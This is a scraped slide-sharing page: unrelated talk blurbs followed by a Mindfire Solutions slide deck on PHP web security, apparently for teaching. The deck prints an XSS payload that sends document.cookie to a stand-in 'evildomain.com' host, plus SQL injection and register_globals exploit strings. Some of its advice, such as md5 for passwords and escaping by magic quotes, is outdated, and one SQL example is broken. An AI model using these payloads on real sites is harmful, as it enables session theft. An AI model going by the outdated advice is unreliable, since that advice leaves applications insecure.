Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Best 20 SEO Techniques To Improve Website Visibility In SERPPixlogix Infotech
Boost your website's visibility with proven SEO techniques! Our latest blog dives into essential strategies to enhance your online presence, increase traffic, and rank higher on search engines. From keyword optimization to quality content creation, learn how to make your site stand out in the crowded digital landscape. Discover actionable tips and expert insights to elevate your SEO game.
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Let's Integrate MuleSoft RPA, COMPOSER, APM with AWS IDP along with Slackshyamraj55
Discover the seamless integration of RPA (Robotic Process Automation), COMPOSER, and APM with AWS IDP enhanced with Slack notifications. Explore how these technologies converge to streamline workflows, optimize performance, and ensure secure access, all while leveraging the power of AWS IDP and real-time communication via Slack notifications.
Full-RAG: A modern architecture for hyper-personalizationZilliz
Mike Del Balso, CEO & Co-Founder at Tecton, presents "Full RAG," a novel approach to AI recommendation systems, aiming to push beyond the limitations of traditional models through a deep integration of contextual insights and real-time data, leveraging the Retrieval-Augmented Generation architecture. This talk will outline Full RAG's potential to significantly enhance personalization, address engineering challenges such as data management and model training, and introduce data enrichment with reranking as a key solution. Attendees will gain crucial insights into the importance of hyperpersonalization in AI, the capabilities of Full RAG for advanced personalization, and strategies for managing complex data integrations for deploying cutting-edge AI solutions.
UiPath Test Automation using UiPath Test Suite series, part 5DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 5. In this session, we will cover CI/CD with devops.
Topics covered:
CI/CD with in UiPath
End-to-end overview of CI/CD pipeline with Azure devops
Speaker:
Lyndsey Byblow, Test Suite Sales Engineer @ UiPath, Inc.
Building Production Ready Search Pipelines with Spark and MilvusZilliz
Spark is the widely used ETL tool for processing, indexing and ingesting data to serving stack for search. Milvus is the production-ready open-source vector database. In this talk we will show how to use Spark to process unstructured data to extract vector representations, and push the vectors to Milvus vector database for search serving.
Threats to mobile devices are more prevalent and increasing in scope and complexity. Users of mobile devices desire to take full advantage of the features
available on those devices, but many of the features provide convenience and capability but sacrifice security. This best practices guide outlines steps the users can take to better protect personal devices and information.
3. Consequently PHP applications often end up working with sensitive data a. Unauthorized access to this data is unacceptable. b. To prevent problems a secure design is needed . www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
4. Basic Steps 1.Input fields must be sanitized before being used One of the key concepts you must accept is that user input is unreliable and not to be trusted. Partially lost in transmission between server & client. Corrupted by some in-between process. Modified by the malicoius user in an unexpected manner. Intentional attempt to gain unauthorized access or to crash the application. There are are many ways to sanitize data. One can use php inbuild function for the santization pupose or can use custom defined functions. Eg: All data passed to PHP (GET/POST/COOKIE) ends up being a string. Using strings where integers are needed is not only inefficient but also dangerous. if (!empty($_GET['id'])) { $id = (int) $_GET['id']; } else{ $id = 0; } As well as PHP comes with a ctype, extension that offers a very quick mechanism for validating string content. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
5. if (!ctype_alnum($_GET['login'])) { echo "Only A-Za-z0-9 are allowed."; } if (!ctype_alpha($_GET['captcha'])) { echo "Only A-Za-z are allowed."; } You can use also your own customized validation.Like function validateEmail($email){ if($email == ""){ return false; } else{ if(!preg_match("(^[-]+@([-a-z0-9]+)+[a-z]{2,4}$)i", $email)){ return false; } else{ return true; } } } www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
6. 2.Data Validations As we all know there are 2 types of validation for a web application. As follows: a. Client side validation b. Server side validation Client side validation is not reliable as an attacker can always bypass the client side validations or can shuts off the client-side script routines, for example, by disabling JavaScript. Hence Server side validation is a must for the security point of view, even if the client-side validation do exists. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
7. 3. Accessing Input Data: There are a series of super-globals which offer very simple access to the input data. $_GET , $_POST, $_SERVER, $_REQUEST Using GET to send sensitive data causes security violation. When sensitive data is to be passed to the server, do not send it as a parameter in the query string like in: http://sitename/check_valid.php?cardnumber=1234567890123456. This is not appropriate because, the entire URL may be stored by the browser in its history, potentially exposing the sensitive information to someone else using the same machine later. The POST method uses the HTTP body to pass information and this is good in this case because the HTTP body is not logged. Using POST doesn’t offer enough protection. The data’s confidentiality and integrity are still at risk because the information is still sent in clear text. So the use of encryption technique is required, using SSL. Ddata is stored and accessed securely. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
8. 4.Escaping Output Output is anything that leaves your application, bound for a client. The client, in this case, is anything from aWeb browser to a database server, and just as you should filter all incoming data, you should escape all outbound data. Whereas filtering input protects your application from bad or harmful data, escaping output protects the client and user from potentially damaging commands. To escape output intended for a Web browser, PHP provides htmlspecialchars() and htmlentities(), EG: $_POST['data'] = “<script>alert('Security issues');</script>”; if (get_magic_quotes_gpc()) { $var = stripslashes($_POST['data']); } echo htmlentities($var ); www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
10. 5.Register Globals The register_globals directive is disabled by default in PHP versions 4.2.0 and greater. Making register global on is a security risk. Therefore, one should always develop and deploy applications with register_globals disabled. Why it is a security risk? Let us consider the following block of codes <?php if (authenticated_user()) { $authorized = true; } if ($authorized) { include '/highly/sensitive/data.php'; } ?> www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
11. Since $authorized is left un-initialized if user authentication fails, an attacker could access privileged data by simply passing the value via GET. http://example.com/script.php?authorized=1 Solutions: Disable register_globals in PHP.ini. Already done by default as of PHP 4.2.0 . Code with error_reporting set to E_ALL. Allows you to see warnings about the use of un-initialized variables. Type sensitive validation conditions. Because input is always a string, type sensitive compare to a Boolean or an integer will always fail. A best practice is to initialize all variables. Error_reporting set to E_ALL, so that the use of an uninitialized variable won't be overlooked during development. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
12. 6.Error Reporting: During development, making error reporting turned on is good practise. ini_set('error_reporting',E_ALL); However, when you put your site into production, this level of detail can be dangerous. You can't foresee all errors during development ,your program could run out of memory or disk space, for example. So, for safety's sake, on production sites you should disable the displaying of errors and instead log them to a file safely outside of your directory root; this way, the public can't see if anything goes wrong. error_reporting(E_ALL^E_NOTICE); // This is a 'sensible' reporting level ini_set('display_errors', 0); // Hide all error messages from the public ini_set('log_errors', 1); ini_set('error_log', 'path/to_your/log.txt'); /* Preferably a location outside of your web root */ www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
13. 7.SQL Injection SQL injection refers to the act of someone inserting a MySQL statement to be run on your database without your knowledge. Injection usually occurs when you ask a user for input, like their name, and instead of a name they give you a MySQL statement that you will unknowingly run on your database. One of the most common vulnerabilities is when logging in to a site. Take this example: $username = $_POST['username']; $password = $_POST['password']; $result = mysql_query(" SELECT * FROM site_users WHERE username = '$username' AND password = '$password' "); if ( mysql_num_rows($result) > 0 ) // logged in www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
14. If the attacker enters a valid username in the username field "rob" and the following in the password field ' OR 1=1 ' The resulting query will look like this: SELECT * FROM site_users WHERE username = 'rob' AND password = '' OR 1=1 Since the last crieteria will always be true.The user will be able to log in as rob without knowing rob's password. Prevnting Sql injection: The best way of cleaning input is using PHP's built in mysql_real_escape_string() function, this will escape characters such as ',"" and others. checking the magic quotes is on or off to avoid double escaping. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
15. Function check_sql_injection($var){ if(get_magic_quotes_gpc()) { $var = stripslashes($var); } $var = mysql_real_escape_string($var); return $var; } Now this customized function can be used in sql query to prevent sql injection.. SELECT * FROM site_users WHERE username =check_sql_injection( '$username') AND password = check_sql_injection( '$password) www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
16. 8.XSS XSS stands for "Cross Site Scripting", and refers to the act of inserting content, such as Javascript, into a page. Usually these attacks are used to steal cookies which often contain sensitive data such as login information. EG: $id = $_GET['id']; echo 'Displaying news item number '.$id; An attacker could pass string like this <script>window.location.href = "http://evildomain.com/cookie-stealer.php?c=' + document.cookie;</script> If a user passed this simple Javascript into the $_GET['id'] variable and convinced a user to click it, then the script would be executed and pass the user's cookie data onto the attacker, allowing them to log in as the user. It's really that simple. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
17. Prevent XSS attacks? This attack works only if the application fails to escape output. Thus, it is easy to prevent this kind of attack with proper output escaping. The easiest way to do this is with PHP's built in strip_tags() function, which will remove HTML from a string rendering it harmless. If you just want to make the HTML safe without removing it altogether, then you need to run the input through htmlentities(), which will convert < and > to < and > respectively. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
18. 9. Passwords need to be stored securely. Secure information, such as passwords and credit card numbers, should be stored in an encrypted format. This can be achivied using md5 command or any stronger method of algorithm. By using this, the attacker wont able access the password of a user. 10. Lock out functionality must be there for the login functionality. An attacker may continue to brute force the login functions until successful. So to prevent the same after a given number of unsuccessful logins over a period of time, the IP/User should be blocked or locked out for another a given period of time. For example 5 unsuccessful logins in 5 minutes may call for a lockout of 30 minutes for that IP/User. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
19. 11.The email forms are vulnerable to email header injection Input should be validated and checked so that email header injection cannot occur. Escaping the CR and LF characters is needed and using captcha during mail form submission. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
20. 12. Using Cookies Securely Cookies are an easy and useful way to keep user-specific information available. However, because cookies are sent to the browser's computer, they are vulnerable to spoofing or other malicious use. Follow these guidelines: Do not store any critical information in cookies. For example, do not store a user's password in a cookie, even temporarily. As a rule, do not store any sensitive information in a cookie. Set expiration dates on cookies to the shortest practical time you can. Avoid permanent cookies if possible. Consider encrypting information in cookies. Consider setting the Secure and HttpOnly properties on your cookies to true. www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions
21.
22. For further queries contact us or call 1-248-686-1424 www.mindfiresolutions.com www.mindfiresolutions.com | www.twitter.com/mindfires | http:// wikipedia.org/wiki/mindfire_solutions